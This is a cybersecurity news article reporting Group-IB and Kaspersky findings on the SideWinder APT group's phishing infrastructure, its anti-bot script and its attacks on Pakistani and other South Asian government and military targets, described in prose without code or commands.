Analysis
Attacks and Vulnerabilities
Critical infrastructure
Malware, Phishing & Ransomware
News
Risk & Compliance
Technology & Solutions
Threat Landscape
Vulnerabilities

Group-IB shares details on APT group SideWinder hacker, targeting government, military, economic sectors

June 02, 2022
Group-IB shares details on APT group SideWinder hacker, targeting government, military, economic sectors

Researchers at Group-IB Threat Intelligence have discovered a new malicious infrastructure and a custom tool of the APT group SideWinder hacker, which is believed to be an Indian nation-state threat actor. In their attacks, SideWinder was seen targeting government, military, and economic sectors across Southeast Asia, including Afghanistan, Nepal, Sri Lanka, Bhutan, Myanmar, the Philippines, Bangladesh, Singapore, and China. However, since the discovery of the group in 2012, Pakistan remains the primary target of SideWinder. 

“Over the last year, Group-IB’s Threat Intelligence solution detected 92 IP addresses used by SideWinder,”  Group-IB researchers said in a blog post. “The servers were automatically detected by Group-IB and Threat Intelligence users immediately received a proactive notification about the appearance of the new malicious infrastructure. The analysis of the servers revealed that they were primarily used for phishing attacks,” they added. 

Phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan have been identified as primary attack vectors of the gang. “SideWinder started using an anti-bot script to filter their victims – they are only interested in Pakistani users. The group continues to distribute malicious files in ZIP archives with an LNK file inside, which downloads an HTA file from a remote server,” the researchers added.

Over the last year, several SideWinder attacks targeting Pakistan have been detected. SideWinder was particularly interested in the Pakistani military targets, the post said. The SideWinder group also goes by the names Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04, and APT-C-17. The newly discovered custom tool, codenamed ‘SideWinder.AntiBot.Script,’ is being used in the gang’s phishing attack against Pakistani targets.

Upon discovery, the Group-IB Threat Intelligence team notified relevant local authorities and shared its findings to make sure that the threat can be identified and contained at its early stages. CERT-GIB also sent notifications to dedicated computer emergency response teams in Pakistan, according to the post. The Pakistani government even published an official advisory about SideWinder activity, the post added.

Group-IB researchers have repeatedly spotted phishing documents intended for Pakistani targets in public and private sector organizations. A phishing document containing information about a proposal for a formal discussion of the impact of U.S. withdrawal from Afghanistan on maritime security was detected. 

The group has also been seen cloning government websites to collect user credentials. The researchers found a phishing page mimicking a government portal in Sri Lanka designed by SideWinder. 

SideWinder has been one of the most aggressive threat actors in the past couple of years. “Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency, and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations,” Kaspersky revealed in a report that was presented at Black Hat Asia last month.

“We have detected over a thousand attacks by this APT actor since April 2020. They also maintain a large infrastructure base with hundreds of domains and subdomains used as Download and Command and Control Servers,” it added.

SideWinder has been active since at least 2012 and for several years, its main target profile included police, military, maritime, and the naval forces of Central Asian countries, Kaspersky said. “In recent years, they have also targeted departments of Foreign Affairs, Scientific and Defence organisations, Aviation, IT industry and Legal firms. Some of their newly registered domains and spearphishing documents indicate this threat actor is expanding the geography of its targets to other countries and regions.”

Kaspersky also said that the threat actor has a relatively high level of sophistication using various infection vectors and advanced attack techniques. “These techniques include multiple obfuscation routines, encryption with unique keys for each malicious file, multi-layer malwares, memory-resident malwares and splitting infrastructure strings into different malware components,” it added.

Recorded Future said in April that it had observed in recent months likely network intrusions targeting at least seven Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electricity dispatch within these respective states.

Anna Ribeiro
Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.

A complimentary guide to the who`s who in industrial cybersecurity tech & solutions

Free Download

Related

Forescout report warns of growing security risks to critical infrastructure as OT/ICS exposed data escalates
Forescout report warns of growing security risks to critical infrastructure as OT/ICS exposed data escalates
ASIS Foundation reports on impact of autonomous vehicles on security and technology
ASIS Foundation reports on impact of autonomous vehicles on security and technology
European Commission makes €112 million investment in AI, quantum research under Horizon Europe program
European Commission makes €112 million investment in AI, quantum research under Horizon Europe program
MITRE unveils ATT&CK v15 with upgraded detections, analytic format, cross-domain adversary insights
MITRE unveils ATT&CK v15 with upgraded detections, analytic format, cross-domain adversary insights
RMC
Risk Mitigation Consulting acquires Securicon, boosting cybersecurity and mission assurance offerings
Hackers target Tipton Municipal Utilities wastewater treatment plant, prompting federal investigation
Hackers target Tipton Municipal Utilities wastewater treatment plant, prompting federal investigation
New CGCYBER report warns of cybersecurity risks in marine environment due to network-connected OT systems
New CGCYBER report warns of cybersecurity risks in marine environment due to network-connected OT systems
Ukrainian CERT details malicious plan by Sandworm group to disrupt critical infrastructure facilities
Ukrainian CERT details malicious plan by Sandworm group to disrupt critical infrastructure facilities
DC3, DCSA collaborate to launch vulnerability disclosure program for defense industrial base
DC3, DCSA collaborate to launch vulnerability disclosure program for defense industrial base
Waterfall’s WF-600 unidirectional security gateway brings 'unbreachable protection' to OT/ICS networks
Waterfall, 2TS enter into cybersecurity alliance for African market